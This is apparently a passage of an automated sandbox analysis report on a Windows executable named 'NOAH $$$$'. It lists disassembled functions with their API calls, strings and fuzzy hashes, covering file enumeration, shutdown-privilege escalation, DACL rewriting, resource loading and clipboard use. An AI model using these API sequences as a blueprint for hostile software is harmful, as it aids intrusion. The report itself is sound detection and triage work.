                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                                                        • String ID: \*.*
                                                                                                                                        • API String ID: 2188072990-1173974218
                                                                                                                                        • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                                                        • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                                                                                        • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                                                        • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                                                        • __swprintf.LIBCMT ref: 004789D3
                                                                                                                                        • __swprintf.LIBCMT ref: 00478A1D
                                                                                                                                        • __swprintf.LIBCMT ref: 00478A4B
                                                                                                                                        • __swprintf.LIBCMT ref: 00478A79
                                                                                                                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                                                          • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                                                                        • __swprintf.LIBCMT ref: 00478AA7
                                                                                                                                        • __swprintf.LIBCMT ref: 00478AD5
                                                                                                                                        • __swprintf.LIBCMT ref: 00478B03
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                        • API String ID: 999945258-2428617273
                                                                                                                                        • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                                        • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                                                        • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                                        • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                                        • __wsplitpath.LIBCMT ref: 00403492
                                                                                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                        • _wcscpy.LIBCMT ref: 004034A7
                                                                                                                                        • _wcscat.LIBCMT ref: 004034BC
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                                                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                                                        • _wcscpy.LIBCMT ref: 004035A0
                                                                                                                                        • _wcslen.LIBCMT ref: 00403623
                                                                                                                                        • _wcslen.LIBCMT ref: 0040367D
                                                                                                                                        Strings
                                                                                                                                        • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                                                        • Unterminated string, xrefs: 00428348
                                                                                                                                        • _, xrefs: 0040371C
                                                                                                                                        • Error opening the file, xrefs: 00428231
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                                        • API String ID: 3393021363-188983378
                                                                                                                                        • Opcode ID: d7567003ac82893a05918a50732f98c0da489d2a1a1b1371126f827adaf0f001
                                                                                                                                        • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                                                        • Opcode Fuzzy Hash: d7567003ac82893a05918a50732f98c0da489d2a1a1b1371126f827adaf0f001
                                                                                                                                        • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 1409584000-438819550
                                                                                                                                        • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                                        • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                                                                        • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                                        • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                                                                        APIs
                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                                                                        • __swprintf.LIBCMT ref: 00431C2E
                                                                                                                                        • _wcslen.LIBCMT ref: 00431C3A
                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                                                                        • String ID: :$\$\??\%s
                                                                                                                                        • API String ID: 2192556992-3457252023
                                                                                                                                        • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                                        • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                                                                        • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                                        • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                                                                        APIs
                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                                                        • __swprintf.LIBCMT ref: 004722B9
                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FolderPath$LocalTime__swprintf
                                                                                                                                        • String ID: %.3d
                                                                                                                                        • API String ID: 3337348382-986655627
                                                                                                                                        • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                                        • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                                                                        • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                                        • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                                                                          • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 2640511053-438819550
                                                                                                                                        • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                                        • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                                                                        • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                                        • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                                                                        • GetLastError.KERNEL32 ref: 00433414
                                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                                                                        • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                                                                        • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                        • API String ID: 2938487562-3733053543
                                                                                                                                        • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                                        • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                                                                                        • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                                        • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                                                          • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                                                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                                                          • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1255039815-0
                                                                                                                                        • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                                        • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                                                                        • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                                        • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                                                                        APIs
                                                                                                                                        • __swprintf.LIBCMT ref: 00433073
                                                                                                                                        • __swprintf.LIBCMT ref: 00433085
                                                                                                                                        • __wcsicoll.LIBCMT ref: 00433092
                                                                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                                                                        • LockResource.KERNEL32(?), ref: 00433120
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1158019794-0
                                                                                                                                        • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                                        • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                                                                        • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                                        • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1737998785-0
                                                                                                                                        • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                                        • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                                                                        • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                                        • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
